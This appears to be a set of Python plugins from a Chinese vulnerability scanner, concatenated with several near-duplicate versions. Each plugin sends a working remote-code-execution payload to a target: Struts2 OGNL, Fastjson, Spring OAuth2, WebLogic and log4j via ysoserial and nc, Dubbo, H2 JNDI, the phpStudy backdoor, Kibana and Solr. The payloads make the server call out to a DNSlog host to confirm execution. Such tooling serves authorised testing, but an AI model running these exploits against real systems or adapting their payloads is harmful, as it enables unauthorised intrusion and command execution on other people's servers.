def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None: proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: DL = Dnslog() payload = "/oauth/authorize?client_id=client&response_type=code&redirect_uri=http://www.github.com&scope=%24%7BT%28java.lang.Runtime%29.getRuntime%28%29.exec%28%22ping%20{}%22%29%7D".format( DL.dns_host()) payload_url = scheme + "://" + url + ":" + str(port) + payload resp = requests.get(payload_url, headers=Headers, proxies=proxies, timeout=6, verify=False) time.sleep(4) if DL.result(): Medusa = "{}存在SpringSecurityOauth2远程代码执行漏洞(CVE-2018-1260)\r\n验证数据:\r\n返回内容:{}\r\nDnsLog:{}\r\nDnsLog数据:{}\r\n".format( url, resp.text, DL.dns_host(), str(DL.dns_text())) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(**kwargs) -> None: url = kwargs.get("Url") # 获取传入的url参数 Headers = kwargs.get("Headers") # 获取传入的头文件 proxies = kwargs.get("Proxies") # 获取传入的代理参数 DL = Dnslog() payload = """?age=medusa&name=%28%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D+new+java.lang.Boolean%28false%29,%20%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3D+new+java.lang.Boolean%28true%29,%[email protected]@getRuntime%28%29.exec%28%27ping%20{}%27%29%29%28meh%29&z%5B%28name%29%28%27meh%27%29%5D=true""".format( DL.dns_host()) try: payload_url = url + payload resp = requests.get(payload_url, headers=Headers, timeout=6, proxies=proxies, verify=False) con = resp.text time.sleep(3) if DL.result(): Medusa = "{} 存在Struts2远程代码执行漏洞(S2-009)\r\n漏洞详情:\r\n版本号:S2-009\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format( url, payload_url, con, DL.dns_text(), DL.dns_host()) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, resp, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(**kwargs) -> None: Url = kwargs.get("Url") # 获取传入的url参数 Headers = kwargs.get("Headers") # 获取传入的头文件 proxies = kwargs.get("Proxies") # 获取传入的代理参数 scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: DL = Dnslog() JrmpPort = "2000" #端口随便 JrmpClient = "JRMPClient" YsoserialPath = GetToolFilePath().Result() + "ysoserial.jar" TempPath = GetTempFilePath().Result() + str(int( time.time())) + "_" + randoms().result(10) con, payload = exploit(url, port, YsoserialPath, DL.dns_host(), JrmpPort, JrmpClient, TempPath) time.sleep(5) if DL.result(): Medusa = "{}存在WeblogicWLS核心组件反序列化命令执行漏洞(CVE-2018-2628)\r\n验证数据:\r\n使用POC:{}\r\n返回数据包:{}\r\nDNSlog内容:{}\r\nDNSlog返回结果:{}\r\n".format( url, payload, con, DL.dns_host(), DL.dns_text()) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, "", **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) # 调用写入类传入URL和错误插件名
def medusa(**kwargs) -> None: url = kwargs.get("Url") #获取传入的url参数 Headers = kwargs.get("Headers") #获取传入的头文件 proxies = kwargs.get("Proxies") #获取传入的代理参数 try: dns = Dnslog() YsoserialPath = GetToolFilePath().Result() + "ysoserial.jar" subprocess.Popen([ "java", "-jar", YsoserialPath, "CommonsCollections5", "ping " + dns.dns_host() ], stdout=subprocess.PIPE) time.sleep(5) if dns.result(): Medusa = "{}存在log4j远程命令执行漏洞(CVE-2019-17571)\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\nDNSlog请求值{}\r\nDNSlog数据{}\r\n".format( url, url, dns.dns_host(), dns.dns_text()) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, "", **kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write( "Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: dns = Dnslog() YsoserialPath = GetToolFilePath().Result() + "ysoserial.jar" subprocess.Popen([ "java", "-jar", YsoserialPath, "CommonsCollections5", "ping " + dns.dns_host() ], stdout=subprocess.PIPE) time.sleep(5) if dns.result(): Medusa = "{}存在log4j远程命令执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\nDNSlog请求值{}\r\nDNSlog数据{}\r\n".format( url, scheme + "://" + url + ":" + str(port), dns.dns_host(), dns.dns_text()) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, **kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write( "Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None: proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/h2-console/login.do?jsessionid=" payload_url = scheme + "://" + url + ":" + str( port) + payload + "ad3ae393781ccf8d7abf0345aa88e398" jsession = requests.get( payload_url, timeout=5, proxies=proxies, verify=False, headers=Headers, ) global pgroups preg = re.compile(r"login\.jsp\?jsessionid=(.*?)'", re.S) pgroups = re.findall(preg, jsession.text) if not pgroups: preg = re.compile(r"admin\.do\?jsessionid=(.*?)\"", re.S) pgroups = re.findall(preg, jsession.text) payload_url2 = scheme + "://" + url + ":" + str( port) + payload + pgroups[0] Headers2 = Headers Headers2['Content-Type'] = 'application/x-www-form-urlencoded' Headers2['Referer'] = payload_url2 DL = Dnslog() data = "language=en&setting=Generic+JNDI+Data+Source&name=Generic+JNDI+Data+Source&driver=javax.naming.InitialContext&url=ldap%3A%2F%2F{}%2FExploit&user=&password="******"{}存在SpringBootH2数据库JNDI注入漏洞\r\n验证数据:\r\n返回内容:{}\r\nDnsLog:{}\r\nDnsLog数据:{}\r\n".format( url, resp.text, DL.dns_host(), str(DL.dns_text())) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload_url = scheme + '://' + url + ':' + str(port) DL = Dnslog() # DL="777777777777.h3me6i.dnslog.cn" data = '''{ "a": { "@type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl" }, "b": { "@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "rmi://%s/Exploit", "autoCommit": true } } ''' % DL.dns_host() headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/json', 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2', "Connection": "close", "Accept-Encoding": "gzip, deflate" } resp = requests.post(payload_url, headers=headers, data=data, proxies=proxies, timeout=10, verify=False) if DL.result() and resp.status_code == 400: Medusa = "{}存在Fastjson反序列化远程代码执行漏洞\r\n 验证数据:\r\n漏洞位置:{}\r\n返回数据:{}\r\nDNSlong:{}\r\n".format( url, payload_url, resp.text, DL.dns_host()) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, ProxyIp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: dns = Dnslog() os.system( 'java -jar {} CommonsCollections5 "ping {}" | nc {} {}'.format( Ysoserial().result(), dns.dns_host(), url, port)) if dns.result(): Medusa = "{}存在log4j远程命令执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\n请看DNSlog数据\r\n".format( url, scheme + "://" + url + ":" + str(port)) _t = VulnerabilityInfo(Medusa) web = ClassCongregation.VulnerabilityDetails(_t.info) web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(**kwargs)->None: url = kwargs.get("Url") # 获取传入的url参数 Headers = kwargs.get("Headers") # 获取传入的头文件 proxies = kwargs.get("Proxies") # 获取传入的代理参数 DL=Dnslog() payload = "/index.php" commandS = ('''system("ping {}");''').format(DL.dns_host()) cmd = base64.b64encode(commandS.encode('utf-8')) try: payload_url = url+payload Headers['Sec-Fetch-Mode']='navigate' Headers['Sec-Fetch-User']='******' Headers['Accept']='text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3' Headers['Sec-Fetch-Site']='none' Headers['accept-charset']=cmd resp = requests.get(payload_url,headers=Headers, timeout=5, proxies=proxies,verify=False) time.sleep(2) if DL.result(): Medusa = "{} 存在phpStudyBackdoor脚本漏洞\r\n漏洞详情:\r\nPayload:{}\r\nHeader:{}\r\nDNSLOG内容:{}\r\n".format(url, payload_url,Headers,DL.dns_host()) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, resp,**kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url:str,RandomAgent:str,proxies:str=None,**kwargs)->None: if proxies!=None: proxies_scheme, proxies_url, proxies_port = UrlProcessing().result(proxies) socks.set_default_proxy(socks.HTTP, addr=proxies_url, port=proxies_port) # 设置socks代理 socket.socket = socks.socksocket # 把代理应用到socket scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: DL=Dnslog() JrmpPort = "2000"#端口随便 JrmpClient = "JRMPClient" YsoserialPath=GetToolFilePath().Result()+"ysoserial.jar" TempPath=GetTempFilePath().Result()+str(int(time.time()))+"_"+randoms().result(10) con,payload=exploit(url, port, YsoserialPath, DL.dns_host(), JrmpPort, JrmpClient,TempPath) time.sleep(5) if DL.result(): Medusa = "{}存在WeblogicWLS核心组件反序列化命令执行漏洞\r\n验证数据:\r\n使用POC:{}\r\n返回数据包:{}\r\nDNSlog内容:{}\r\nDNSlog返回结果:{}\r\n".format(url,payload,con,DL.dns_host(),DL.dns_text()) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e) # 调用写入类传入URL和错误插件名
def medusa(**kwargs)->None: url=kwargs.get("Url")#获取传入的url参数 Headers=kwargs.get("Headers")#获取传入的头文件 proxies=kwargs.get("Proxies")#获取传入的代理参数 try: payload_url = url DL=Dnslog() data = { "b": { "@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "rmi://" + DL.dns_host() + "//Exploit", "autoCommit": True } } data = json.dumps(data) Headers['Content-Type']='application/json' Headers["Connection"]="close" resp = requests.post(payload_url, headers=Headers, data=data,proxies=proxies, timeout=10, verify=False) if DL.result() and resp.status_code==500: Medusa = "{}存在Fastjson反序列化远程代码执行漏洞\r\n 验证数据:\r\n漏洞位置:{}\r\n返回数据:{}\r\nDNSlong:{}\r\n".format(url, payload_url, resp.text,DL.dns_host()) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, resp,**kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: dns = Dnslog() os.system( 'java -jar {} CommonsCollections5 "ping {}" | nc {} {}'.format( Ysoserial().result(), dns.dns_host(), url, port)) if dns.result(): Medusa = "{}存在log4j远程命令执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\n请看DNSlog数据\r\n".format( url, scheme + "://" + url + ":" + str(port)) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, **kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write( "Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port, path = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port DL = Dnslog() con = "" payload = """%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23m.setAccessible%28true%29%2C%23m.set%28%23_memberAccess%2Ctrue%29%2C%23q%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27ping%20{}%27%29.getInputStream%28%29%29%2C%23q%7D.action""".format( DL.dns_host()) try: payload_url = scheme + "://" + url + ":" + str(port) + path + payload headers = { 'User-Agent': RandomAgent, "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } try: #防止在linux系统上执行了POC,导致超时扫描不到漏洞 resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False) con = resp.text except: pass time.sleep(2) if DL.result(): Medusa = "{} 存在Struts2远程代码执行漏洞(S2-015)\r\n漏洞详情:\r\n版本号:S2-015\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format( url, payload_url, con, DL.dns_text(), DL.dns_host()) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port, path = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port DL = Dnslog() con = "" payload = """?redirect:%24%7B%23a%3D%28new%20java.lang.ProcessBuilder%28new%20java.lang.String%5B%5D%7B%27ping%27%2c%27{}%27%7D%29%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew%20java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew%20java.io.BufferedReader%28%23c%29%2C%23e%3Dnew%20char%5B500%5D%2C%23d.read%28%23e%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23e%29%2C%23d.read%28%23e%29%2C%23matt.getWriter%28%29.println%28%23e%29%2C%23d.read%28%23e%29%2C%23matt.getWriter%28%29.println%28%23e%29%2C%23d.read%28%23e%29%2C%23matt.getWriter%28%29.println%28%23e%29%2C%23d.read%28%23e%29%2C%23matt.getWriter%28%29.println%28%23e%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D""".format( DL.dns_host()) try: payload_url = scheme + "://" + url + ":" + str(port) + path + payload headers = { 'User-Agent': RandomAgent, "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } try: #防止在linux系统上执行了POC,导致超时扫描不到漏洞 resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False) con = resp.text except: pass time.sleep(2) if DL.result(): Medusa = "{} 存在Struts2远程代码执行漏洞(S2-016)\r\n漏洞详情:\r\n版本号:S2-016\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format( url, payload_url, con, DL.dns_text(), DL.dns_host()) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None: proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port DL = Dnslog() payload = "/index.php" commandS = ('''system("ping {}");''').format(DL.dns_host()) cmd = base64.b64encode(commandS.encode('utf-8')) try: payload_url = scheme + "://" + url + ':' + str(port) + payload headers = { 'Sec-Fetch-Mode': 'navigate', 'Sec-Fetch-User': '******', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3', 'Sec-Fetch-Site': 'none', 'accept-charset': cmd, 'Accept-Encoding': 'gzip,deflate', 'Accept-Language': 'zh-CN,zh;q=0.9', 'User-Agent': RandomAgent } resp = requests.get(payload_url, headers=headers, timeout=5, proxies=proxies, verify=False) time.sleep(2) if DL.result(): Medusa = "{} 存在phpStudyBackdoor脚本漏洞\r\n漏洞详情:\r\nPayload:{}\r\nHeader:{}\r\nDNSLOG内容:{}\r\n".format( url, payload_url, headers, DL.dns_host()) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(**kwargs) -> None: Url = kwargs.get("Url") #获取传入的url参数 scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: DL = Dnslog() client = DubboClient(url, int(port)) JdbcRowSetImpl = new_object('com.sun.rowset.JdbcRowSetImpl', dataSource="ldap://" + DL.dns_host(), strMatchColumns=["foo"]) JdbcRowSetImplClass = new_object( 'java.lang.Class', name="com.sun.rowset.JdbcRowSetImpl", ) toStringBean = new_object('com.rometools.rome.feed.impl.ToStringBean', beanClass=JdbcRowSetImplClass, obj=JdbcRowSetImpl) resp = client.send_request_and_return_response( service_name= 'org.apache.dubbo.spring.boot.sample.consumer.DemoService', # 此处可以是 $invoke、$invokeSync、$echo 等,通杀 2.7.7 及 CVE 公布的所有版本。 method_name='$invoke', args=[toStringBean]) time.sleep(3) if DL.result(): Medusa = "{} 存在Dubbo反序列化漏洞(CVE-2020-1948)\r\n验证数据:\r\n返回DNSLOG:{}\r\n使用DNSLOG数据:{}\r\n返回数据包:{}\r\n".format( url, DL.dns_text(), DL.dns_host(), str(resp)) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, "", **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, UnixTimestamp): scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload_url = scheme + '://' + url + ':' + str(port) DL = Dnslog() data = { "b": { "@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "rmi://" + DL.dns_host() + "//Exploit", "autoCommit": True } } data = json.dumps(data) headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/json', 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2', "Connection": "close", "Accept-Encoding": "gzip, deflate" } resp = requests.post(payload_url, headers=headers, data=data, timeout=10, verify=False) if DL.result() and resp.status_code == 500: Medusa = "{}存在Fastjson反序列化远程代码执行漏洞\r\n 验证数据:\r\n漏洞位置:{}\r\n返回数据:{}\r\nDNSlong:{}\r\n".format( url, payload_url, resp.text, DL.dns_host()) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: DL = Dnslog() payload_url1 = scheme + '://' + url + ':' + str( port) + "/api/timelion/run" payload_url2 = scheme + '://' + url + ':' + str(port) + '/app/canvas' payload_post = '''{"sheet":[".es(*).props(label.__proto__.env.AAAA='require(\"child_process\").exec(\"ping %s\");process.exit()//')\n.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')"],"time":{"from":"now-15m","to":"now","mode":"quick","interval":"auto","timezone":"Asia/Shanghai"}}''' % DL.dns_host( ) headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/json;charset=utf-8', 'Referer': scheme + '://' + url + ':' + str(port) + '/app/timelion', 'Accept-Encoding': 'gzip, deflate', 'Accept': 'application/json, text/plain, */*', 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2', } resp = requests.post(payload_url1, headers=headers, proxies=proxies, data=payload_post, timeout=5, verify=False) resp2 = requests.get(payload_url2, headers=headers, proxies=proxies, timeout=5, verify=False) if DL.result(): Medusa = "{}存在Kibana远程命令执行漏洞\r\n 验证数据:\r\n漏洞位置:{}\r\nDNSlog内容:{}\r\n".format( url, payload_url1, DL.dns_host(), ) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, UnixTimestamp): scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: headers = { 'User-Agent': RandomAgent, 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } payload_url = scheme + "://" + url + ":" + str( port) + '/solr/admin/cores' step1 = requests.get(payload_url, timeout=6, headers=headers).text data = json.loads(step1) if 'status' in data: name = '' for x in data['status']: name = x payload = "/solr/" + name + "/dataimport?_=1582117587113&indent=on&wt=json" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Accept': 'application/json', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "X-Requested-With": "XMLHttpRequest" } DL = Dnslog() # 初始化DNSlog #POC没问题DNSlog有问题 # DL="p61rpm.dnslog.cn" data2 = "command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22ping+{}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport".format( DL.dns_host()) resp = requests.post(payload_url, data=data2, headers=headers, timeout=20, verify=False) if DL.result(): Medusa = "{}存在Solr远程代码执行漏洞\r\n 验证数据:\r\n漏洞位置:{}\r\nPOST包:{}\r\n".format( url, payload_url, data2) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port, path = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port DL = Dnslog() payload = """?debug=command&expression=(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%[email protected]@getRuntime%28%29.exec%28%22ping%20{}%22%29)""".format( DL.dns_host()) try: payload_url = scheme + "://" + url + ":" + str(port) + path + payload headers = { 'User-Agent': RandomAgent, "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False) con = resp.text time.sleep(3) if DL.result(): Medusa = "{} 存在Struts2远程代码执行漏洞(S2-008)\r\n漏洞详情:\r\n版本号:S2-008\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format( url, payload_url, con, DL.dns_text(), DL.dns_host()) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
